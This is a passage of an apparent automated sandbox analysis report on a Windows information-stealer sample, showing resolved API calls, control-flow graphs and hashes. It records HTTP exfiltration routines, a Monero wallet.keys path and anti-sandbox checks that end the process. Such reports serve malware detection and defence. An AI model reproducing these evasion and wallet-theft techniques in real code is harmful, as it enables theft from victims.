                                  • GetProcAddress.KERNEL32(734B0000,011DCF38), ref: 0071A51B
                                  • GetProcAddress.KERNEL32(763B0000,011C5060), ref: 0071A53C
                                  • GetProcAddress.KERNEL32(763B0000,011C4F80), ref: 0071A554
                                  • GetProcAddress.KERNEL32(763B0000,011DCFF8), ref: 0071A56D
                                  • GetProcAddress.KERNEL32(763B0000,011DCFC8), ref: 0071A585
                                  • GetProcAddress.KERNEL32(763B0000,011C4DC0), ref: 0071A59D
                                  • GetProcAddress.KERNEL32(750F0000,011CAA90), ref: 0071A5C3
                                  • GetProcAddress.KERNEL32(750F0000,011CAE50), ref: 0071A5DB
                                  • GetProcAddress.KERNEL32(750F0000,011DCFE0), ref: 0071A5F3
                                  • GetProcAddress.KERNEL32(750F0000,011C4F40), ref: 0071A60C
                                  • GetProcAddress.KERNEL32(750F0000,011C4E40), ref: 0071A624
                                  • GetProcAddress.KERNEL32(750F0000,011CABF8), ref: 0071A63C
                                  • GetProcAddress.KERNEL32(75A50000,011DCF50), ref: 0071A662
                                  • GetProcAddress.KERNEL32(75A50000,011C5140), ref: 0071A67A
                                  • GetProcAddress.KERNEL32(75A50000,011D91E0), ref: 0071A692
                                  • GetProcAddress.KERNEL32(75A50000,011DD148), ref: 0071A6AB
                                  • GetProcAddress.KERNEL32(75A50000,011DCF68), ref: 0071A6C3
                                  • GetProcAddress.KERNEL32(75A50000,011C5180), ref: 0071A6DB
                                  • GetProcAddress.KERNEL32(75A50000,011C5160), ref: 0071A6F4
                                  • GetProcAddress.KERNEL32(75A50000,011DD160), ref: 0071A70C
                                  • GetProcAddress.KERNEL32(75A50000,011DD010), ref: 0071A724
                                  • GetProcAddress.KERNEL32(75070000,011C4FE0), ref: 0071A746
                                  • GetProcAddress.KERNEL32(75070000,011DD190), ref: 0071A75E
                                  • GetProcAddress.KERNEL32(75070000,011DD1D8), ref: 0071A776
                                  • GetProcAddress.KERNEL32(75070000,011DD208), ref: 0071A78F
                                  • GetProcAddress.KERNEL32(75070000,011DD028), ref: 0071A7A7
                                  • GetProcAddress.KERNEL32(74E50000,011C50E0), ref: 0071A7C8
                                  • GetProcAddress.KERNEL32(74E50000,011C4FC0), ref: 0071A7E1
                                  • GetProcAddress.KERNEL32(75320000,011C5080), ref: 0071A802
                                  • GetProcAddress.KERNEL32(75320000,011DD3E8), ref: 0071A81A
                                  • GetProcAddress.KERNEL32(6F060000,011C4DA0), ref: 0071A840
                                  • GetProcAddress.KERNEL32(6F060000,011C4EA0), ref: 0071A858
                                  • GetProcAddress.KERNEL32(6F060000,011C4E00), ref: 0071A870
                                  • GetProcAddress.KERNEL32(6F060000,011DD418), ref: 0071A889
                                  • GetProcAddress.KERNEL32(6F060000,011C5000), ref: 0071A8A1
                                  • GetProcAddress.KERNEL32(6F060000,011C50A0), ref: 0071A8B9
                                  • GetProcAddress.KERNEL32(6F060000,011C5020), ref: 0071A8D2
                                  • GetProcAddress.KERNEL32(6F060000,011C4EE0), ref: 0071A8EA
                                  • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0071A901
                                  • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0071A917
                                  • GetProcAddress.KERNEL32(74E00000,011DD430), ref: 0071A939
                                  • GetProcAddress.KERNEL32(74E00000,011D91F0), ref: 0071A951
                                  • GetProcAddress.KERNEL32(74E00000,011DD448), ref: 0071A969
                                  • GetProcAddress.KERNEL32(74E00000,011DD400), ref: 0071A982
                                  • GetProcAddress.KERNEL32(74DF0000,011C4E20), ref: 0071A9A3
                                  • GetProcAddress.KERNEL32(6E110000,011DD3D0), ref: 0071A9C4
                                  • GetProcAddress.KERNEL32(6E110000,011C50C0), ref: 0071A9DD
                                  • GetProcAddress.KERNEL32(6E110000,011DD2C8), ref: 0071A9F5
                                  • GetProcAddress.KERNEL32(6E110000,011DD298), ref: 0071AA0D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: HttpQueryInfoA$InternetSetOptionA
                                  • API String ID: 2238633743-1775429166
                                  • Opcode ID: 2fff0fc5339413343ac88f1efddb99eceb709421089cb889c56cae13337a1fe0
                                  • Instruction ID: bc394ead166b0342a7f10d6f47b076d538ead42828d96a69d3a45204fe02465a
                                  • Opcode Fuzzy Hash: 2fff0fc5339413343ac88f1efddb99eceb709421089cb889c56cae13337a1fe0
                                  • Instruction Fuzzy Hash: 49622EB65BE2509FC344DFE8FD88956B7B9A74D301310861BBA19C3274E734A9C0EB60

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 801 7048d0-704992 call 71aab0 call 704800 call 71aa50 * 5 InternetOpenA StrCmpCA 816 704994 801->816 817 70499b-70499f 801->817 816->817 818 7049a5-704b1d call 718cf0 call 71ac30 call 71abb0 call 71ab10 * 2 call 71acc0 call 71abb0 call 71ab10 call 71acc0 call 71abb0 call 71ab10 call 71ac30 call 71abb0 call 71ab10 call 71acc0 call 71abb0 call 71ab10 call 71acc0 call 71abb0 call 71ab10 call 71acc0 call 71ac30 call 71abb0 call 71ab10 * 2 InternetConnectA 817->818 819 704f1b-704f43 InternetCloseHandle call 71ade0 call 70a210 817->819 818->819 905 704b23-704b27 818->905 828 704f82-704ff2 call 718b20 * 2 call 71aab0 call 71ab10 * 8 819->828 829 704f45-704f7d call 71ab30 call 71acc0 call 71abb0 call 71ab10 819->829 829->828 906 704b35 905->906 907 704b29-704b33 905->907 908 704b3f-704b72 HttpOpenRequestA 906->908 907->908 909 704b78-704e78 call 71acc0 call 71abb0 call 71ab10 call 71ac30 call 71abb0 call 71ab10 call 71acc0 call 71abb0 call 71ab10 call 71acc0 call 71abb0 call 71ab10 call 71acc0 call 71abb0 call 71ab10 call 71acc0 call 71abb0 call 71ab10 call 71ac30 call 71abb0 call 71ab10 call 71acc0 call 71abb0 call 71ab10 call 71acc0 call 71abb0 call 71ab10 call 71ac30 call 71abb0 call 71ab10 call 71acc0 call 71abb0 call 71ab10 call 71acc0 call 71abb0 call 71ab10 call 71acc0 call 71abb0 call 71ab10 call 71acc0 call 71abb0 call 71ab10 call 71ac30 call 71abb0 call 71ab10 call 71aa50 call 71ac30 * 2 call 71abb0 call 71ab10 * 2 call 71ade0 lstrlen call 71ade0 * 2 lstrlen call 71ade0 HttpSendRequestA 908->909 910 704f0e-704f15 InternetCloseHandle 908->910 1021 704e82-704eac InternetReadFile 909->1021 910->819 1022 704eb7-704f09 InternetCloseHandle call 71ab10 1021->1022 1023 704eae-704eb5 1021->1023 1022->910 1023->1022 1024 704eb9-704ef7 call 71acc0 call 71abb0 call 71ab10 1023->1024 1024->1021
                                  APIs
                                    • Part of subcall function 0071AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0071AAF6
                                    • Part of subcall function 00704800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00704889
                                    • Part of subcall function 00704800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00704899
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00704965
                                  • StrCmpCA.SHLWAPI(?,011DE920), ref: 0070498A
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00704B0A
                                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00720DDE,00000000,?,?,00000000,?,",00000000,?,011DE930), ref: 00704E38
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00704E54
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00704E68
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00704E99
                                  • InternetCloseHandle.WININET(00000000), ref: 00704EFD
                                  • InternetCloseHandle.WININET(00000000), ref: 00704F15
                                  • HttpOpenRequestA.WININET(00000000,011DE8C0,?,011DE3B0,00000000,00000000,00400100,00000000), ref: 00704B65
                                    • Part of subcall function 0071ACC0: lstrlen.KERNEL32(?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 0071ACD5
                                    • Part of subcall function 0071ACC0: lstrcpy.KERNEL32(00000000), ref: 0071AD14
                                    • Part of subcall function 0071ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0071AD22
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                    • Part of subcall function 0071AC30: lstrcpy.KERNEL32(00000000,?), ref: 0071AC82
                                    • Part of subcall function 0071AC30: lstrcat.KERNEL32(00000000), ref: 0071AC92
                                  • InternetCloseHandle.WININET(00000000), ref: 00704F1F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 460715078-2180234286
                                  • Opcode ID: 0b28f7a604f003edc32b31f4fbb9a9797b74fd1f901305d7f0c4e5754e342459
                                  • Instruction ID: 8334919824ed8f741f984b6ec08189128eaede7900f612d271eb83c9ea3c7058
                                  • Opcode Fuzzy Hash: 0b28f7a604f003edc32b31f4fbb9a9797b74fd1f901305d7f0c4e5754e342459
                                  • Instruction Fuzzy Hash: C5120FB2A16158EACB24EB94DD66FEEB379AF14310F404199F106620D1DF382F88CF65

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1090 715760-7157c7 call 715d20 call 71ab30 * 3 call 71aa50 * 4 1106 7157cc-7157d3 1090->1106 1107 7157d5-715806 call 71ab30 call 71aab0 call 701590 call 715440 1106->1107 1108 715827-71589c call 71aa50 * 2 call 701590 call 715510 call 71abb0 call 71ab10 call 71ade0 StrCmpCA 1106->1108 1124 71580b-715822 call 71abb0 call 71ab10 1107->1124 1133 7158e3-7158f9 call 71ade0 StrCmpCA 1108->1133 1138 71589e-7158de call 71aab0 call 701590 call 715440 call 71abb0 call 71ab10 1108->1138 1124->1133 1140 715a2c-715a94 call 71abb0 call 71ab30 * 2 call 7016b0 call 71ab10 * 4 call 701670 call 701550 1133->1140 1141 7158ff-715906 1133->1141 1138->1133 1270 715d13-715d16 1140->1270 1144 715a2a-715aaf call 71ade0 StrCmpCA 1141->1144 1145 71590c-715913 1141->1145 1164 715be1-715c49 call 71abb0 call 71ab30 * 2 call 7016b0 call 71ab10 * 4 call 701670 call 701550 1144->1164 1165 715ab5-715abc 1144->1165 1149 715915-715969 call 71ab30 call 71aab0 call 701590 call 715440 call 71abb0 call 71ab10 1145->1149 1150 71596e-7159e3 call 71aa50 * 2 call 701590 call 715510 call 71abb0 call 71ab10 call 71ade0 StrCmpCA 1145->1150 1149->1144 1150->1144 1250 7159e5-715a25 call 71aab0 call 701590 call 715440 call 71abb0 call 71ab10 1150->1250 1164->1270 1171 715ac2-715ac9 1165->1171 1172 715bdf-715c64 call 71ade0 StrCmpCA 1165->1172 1180 715b23-715b98 call 71aa50 * 2 call 701590 call 715510 call 71abb0 call 71ab10 call 71ade0 StrCmpCA 1171->1180 1181 715acb-715b1e call 71ab30 call 71aab0 call 701590 call 715440 call 71abb0 call 71ab10 1171->1181 1201 715c66-715c71 Sleep 1172->1201 1202 715c78-715ce1 call 71abb0 call 71ab30 * 2 call 7016b0 call 71ab10 * 4 call 701670 call 701550 1172->1202 1180->1172 1275 715b9a-715bda call 71aab0 call 701590 call 715440 call 71abb0 call 71ab10 1180->1275 1181->1172 1201->1106 1202->1270 1250->1144 1275->1172
                                  APIs
                                    • Part of subcall function 0071AB30: lstrlen.KERNEL32(00704F55,?,?,00704F55,00720DDF), ref: 0071AB3B
                                    • Part of subcall function 0071AB30: lstrcpy.KERNEL32(00720DDF,00000000), ref: 0071AB95
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00715894
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007158F1
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00715AA7
                                    • Part of subcall function 0071AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0071AAF6
                                    • Part of subcall function 00715440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00715478
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                    • Part of subcall function 00715510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00715568
                                    • Part of subcall function 00715510: lstrlen.KERNEL32(00000000), ref: 0071557F
                                    • Part of subcall function 00715510: StrStrA.SHLWAPI(00000000,00000000), ref: 007155B4
                                    • Part of subcall function 00715510: lstrlen.KERNEL32(00000000), ref: 007155D3
                                    • Part of subcall function 00715510: lstrlen.KERNEL32(00000000), ref: 007155FE
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 007159DB
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00715B90
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00715C5C
                                  • Sleep.KERNEL32(0000EA60), ref: 00715C6B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen$Sleep
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 507064821-2791005934
                                  • Opcode ID: e7a4dabf0c078248723996ee8a42160119719765e104ee258d8ea069f2aafa7e
                                  • Instruction ID: 874d0dddf22eeb2bc2a7b1f273056598e9b1493dee79ab0c5502038a63e0f0e9
                                  • Opcode Fuzzy Hash: e7a4dabf0c078248723996ee8a42160119719765e104ee258d8ea069f2aafa7e
                                  • Instruction Fuzzy Hash: 40E17871A55104EACB18FBA8ECABDED737DAF54310F408558F506660D1EF386B88CB62

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1301 7119f0-711a1d call 71ade0 StrCmpCA 1304 711a27-711a41 call 71ade0 1301->1304 1305 711a1f-711a21 ExitProcess 1301->1305 1309 711a44-711a48 1304->1309 1310 711c12-711c1d call 71ab10 1309->1310 1311 711a4e-711a61 1309->1311 1313 711a67-711a6a 1311->1313 1314 711bee-711c0d 1311->1314 1316 711a71-711a80 call 71ab30 1313->1316 1317 711a99-711aa8 call 71ab30 1313->1317 1318 711afd-711b0e StrCmpCA 1313->1318 1319 711b1f-711b30 StrCmpCA 1313->1319 1320 711bdf-711be9 call 71ab30 1313->1320 1321 711b41-711b52 StrCmpCA 1313->1321 1322 711ba1-711bb2 StrCmpCA 1313->1322 1323 711bc0-711bd1 StrCmpCA 1313->1323 1324 711b63-711b74 StrCmpCA 1313->1324 1325 711b82-711b93 StrCmpCA 1313->1325 1326 711a85-711a94 call 71ab30 1313->1326 1327 711aad-711abe StrCmpCA 1313->1327 1328 711acf-711ae0 StrCmpCA 1313->1328 1314->1309 1316->1314 1317->1314 1336 711b10-711b13 1318->1336 1337 711b1a 1318->1337 1338 711b32-711b35 1319->1338 1339 711b3c 1319->1339 1320->1314 1340 711b54-711b57 1321->1340 1341 711b5e 1321->1341 1346 711bb4-711bb7 1322->1346 1347 711bbe 1322->1347 1349 711bd3-711bd6 1323->1349 1350 711bdd 1323->1350 1342 711b80 1324->1342 1343 711b76-711b79 1324->1343 1344 711b95-711b98 1325->1344 1345 711b9f 1325->1345 1326->1314 1332 711ac0-711ac3 1327->1332 1333 711aca 1327->1333 1334 711ae2-711aec 1328->1334 1335 711aee-711af1 1328->1335 1332->1333 1333->1314 1354 711af8 1334->1354 1335->1354 1336->1337 1337->1314 1338->1339 1339->1314 1340->1341 1341->1314 1342->1314 1343->1342 1344->1345 1345->1314 1346->1347 1347->1314 1349->1350 1350->1314 1354->1314
                                  APIs
                                  • StrCmpCA.SHLWAPI(00000000,block), ref: 00711A15
                                  • ExitProcess.KERNEL32 ref: 00711A21
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID: block
                                  • API String ID: 621844428-2199623458
                                  • Opcode ID: b9c9fe9c1e5f698e64bd9b836d91de584d1be9020f5abec690de04f104ec1092
                                  • Instruction ID: 1e4f630a6e1307e2e9a8d43c58d49ab32147cda37128eb2d5b7938accf80bbd4
                                  • Opcode Fuzzy Hash: b9c9fe9c1e5f698e64bd9b836d91de584d1be9020f5abec690de04f104ec1092
                                  • Instruction Fuzzy Hash: 525153B4B4E109EFCB14DFD8D954AEE77B9EF44304F508049E611AB281E778E980DB61

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00719BB0: GetProcAddress.KERNEL32(75900000,011D0E18), ref: 00719BF1
                                    • Part of subcall function 00719BB0: GetProcAddress.KERNEL32(75900000,011D0D10), ref: 00719C0A
                                    • Part of subcall function 00719BB0: GetProcAddress.KERNEL32(75900000,011D0E30), ref: 00719C22
                                    • Part of subcall function 00719BB0: GetProcAddress.KERNEL32(75900000,011D0ED8), ref: 00719C3A
                                    • Part of subcall function 00719BB0: GetProcAddress.KERNEL32(75900000,011D0D28), ref: 00719C53
                                    • Part of subcall function 00719BB0: GetProcAddress.KERNEL32(75900000,011D9160), ref: 00719C6B
                                    • Part of subcall function 00719BB0: GetProcAddress.KERNEL32(75900000,011C5320), ref: 00719C83
                                    • Part of subcall function 00719BB0: GetProcAddress.KERNEL32(75900000,011C5480), ref: 00719C9C
                                    • Part of subcall function 00719BB0: GetProcAddress.KERNEL32(75900000,011D0D40), ref: 00719CB4
                                    • Part of subcall function 00719BB0: GetProcAddress.KERNEL32(75900000,011D0DA0), ref: 00719CCC
                                    • Part of subcall function 00719BB0: GetProcAddress.KERNEL32(75900000,011D0EC0), ref: 00719CE5
                                    • Part of subcall function 00719BB0: GetProcAddress.KERNEL32(75900000,011D0F38), ref: 00719CFD
                                    • Part of subcall function 00719BB0: GetProcAddress.KERNEL32(75900000,011C5340), ref: 00719D15
                                    • Part of subcall function 00719BB0: GetProcAddress.KERNEL32(75900000,011D0DB8), ref: 00719D2E
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                    • Part of subcall function 007011D0: ExitProcess.KERNEL32 ref: 00701211
                                    • Part of subcall function 00701160: GetSystemInfo.KERNEL32(?), ref: 0070116A
                                    • Part of subcall function 00701160: ExitProcess.KERNEL32 ref: 0070117E
                                    • Part of subcall function 00701110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0070112B
                                    • Part of subcall function 00701110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00701132
                                    • Part of subcall function 00701110: ExitProcess.KERNEL32 ref: 00701143
                                    • Part of subcall function 00701220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0070123E
                                    • Part of subcall function 00701220: __aulldiv.LIBCMT ref: 00701258
                                    • Part of subcall function 00701220: __aulldiv.LIBCMT ref: 00701266
                                    • Part of subcall function 00701220: ExitProcess.KERNEL32 ref: 00701294
                                    • Part of subcall function 00716A10: GetUserDefaultLangID.KERNEL32 ref: 00716A14
                                    • Part of subcall function 00701190: ExitProcess.KERNEL32 ref: 007011C6
                                    • Part of subcall function 007179E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007011B7), ref: 00717A10
                                    • Part of subcall function 007179E0: RtlAllocateHeap.NTDLL(00000000), ref: 00717A17
                                    • Part of subcall function 007179E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00717A2F
                                    • Part of subcall function 00717A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00717AA0
                                    • Part of subcall function 00717A70: RtlAllocateHeap.NTDLL(00000000), ref: 00717AA7
                                    • Part of subcall function 00717A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00717ABF
                                    • Part of subcall function 0071ACC0: lstrlen.KERNEL32(?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 0071ACD5
                                    • Part of subcall function 0071ACC0: lstrcpy.KERNEL32(00000000), ref: 0071AD14
                                    • Part of subcall function 0071ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0071AD22
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,011D9250,?,007210F4,?,00000000,?,007210F8,?,00000000,00720AF3), ref: 00716D6A
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00716D88
                                  • CloseHandle.KERNEL32(00000000), ref: 00716D99
                                  • Sleep.KERNEL32(00001770), ref: 00716DA4
                                  • CloseHandle.KERNEL32(?,00000000,?,011D9250,?,007210F4,?,00000000,?,007210F8,?,00000000,00720AF3), ref: 00716DBA
                                  • ExitProcess.KERNEL32 ref: 00716DC2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
